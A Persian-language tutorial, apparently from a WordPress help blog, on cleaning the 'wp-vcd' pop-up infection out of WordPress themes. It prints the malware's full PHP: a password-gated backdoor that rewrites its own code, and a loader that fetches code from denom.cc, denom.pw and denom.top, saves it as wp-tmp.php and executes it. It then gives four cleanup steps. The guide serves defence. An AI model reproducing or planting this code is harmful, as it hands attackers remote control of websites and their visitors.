بازدید: 765 بازدید

آموزش حذف ویروس پاپ آپ وردپرس می پردازیم ( ($_REQUEST[‘action’]) && isset($_REQUEST[‘password’]) && ) شاید شده باشه که بعضی وقت ها که وب سایت خودتان یا دیگران را باز می کنید یک پاپ آپ نمایش داده شود و خیلی سریع بسته شود یا redirect شود در ادامه با ما همراه باشید تا این ویروس از سایت وردپرسی خود حذف کنید.
اگر فایلی به نام wp-vcd.php دید صد در صد سایت شما هک شده زودتر اقدام به تغییر اطلاعات ورودی خود کنید.
معمولا این ویروس بیشتر در قالب های null و پلاگین ها وجود دارد.
بهتر است قبل از انجام کارهای پایین یک بک آپ از قالب خود بگیرید.
ویروس به شکل زیر در فایل function.php قالب شما می نشیند.

if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '429acb1c29e4800452a3538a8f91edd0'))
{
$div_code_name="wp_vcd";
switch ($_REQUEST['action'])
{
case 'change_domain';
if (isset($_REQUEST['newdomain']))
{
if (!empty($_REQUEST['newdomain']))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all('/\$tmpcontent = @file_get_contents\("https:\/\/(.*)\/code\.php/i',$file,$matcholddomain))
{
$file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
@file_put_contents(__FILE__, $file);
print "true";
}
}
}
}
break;
case 'change_code';
if (isset($_REQUEST['newcode']))
{
if (!empty($_REQUEST['newcode']))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode))
{
$file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
@file_put_contents(__FILE__, $file);
print "true";
}
}
}
}
break;
default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
}
die("");
}
$div_code_name = "wp_vcd";
$funcfile = __FILE__;
if(!function_exists('theme_temp_setup')) {
$path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
function file_get_contents_tcurl($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}
function theme_temp_setup($phpCode)
{
$tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
$handle = fopen($tmpfname, "w+");
if( fwrite($handle, "<?php\n" . $phpCode))
{
}
else
{
$tmpfname = tempnam('./', "theme_temp_setup");
$handle = fopen($tmpfname, "w+");
fwrite($handle, "<?php\n" . $phpCode);
}
fclose($handle);
include $tmpfname;
unlink($tmpfname);
return get_defined_vars();
}
$wp_auth_key='70daf53a6c8b84ec5c45e84e576ae4d2';
if (($tmpcontent = @file_get_contents("https://www.denom.cc/code.php") OR $tmpcontent = @file_get_contents_tcurl("https://www.denom.cc/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}
}
}
elseif ($tmpcontent = @file_get_contents("https://www.denom.pw/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) {
if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}
}
} elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
} elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
} elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
} elseif (($tmpcontent = @file_get_contents("https://www.denom.top/code.php") OR $tmpcontent = @file_get_contents_tcurl("https://www.denom.top/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
}
}
}
//wp_tmp
//$end_wp_theme_tmp

باید 4 کار انجام دهید.
مرحله اول تغییر رمز عبور سایت وردپرسی خود
مرحله دوم باید وارد پوشه wp-include در وردپرس شده و دو فایل به نام های wp-vcd.php و class.wp.php را حذف کنید.
مرحله سوم باید وارد پوشه wp-include شده و فایل post.php را باز کنید اگر در ابتدای فایل واژه ای مثل wp-vcd دید سریع آن فانکشن را حذف کنید. (در برخی موارد دیده شده که این فایل خالی بوده ولی چک کنید حتما)
مرحله چهارم فایل functions.php مربوط به قالب خود را باز کنید و کدهایی که بالا قرار دادیم مطئنن قابل رویت هستن در ابتدای فایل شما آنها را حذف کنید و تمام

ادامه مطلب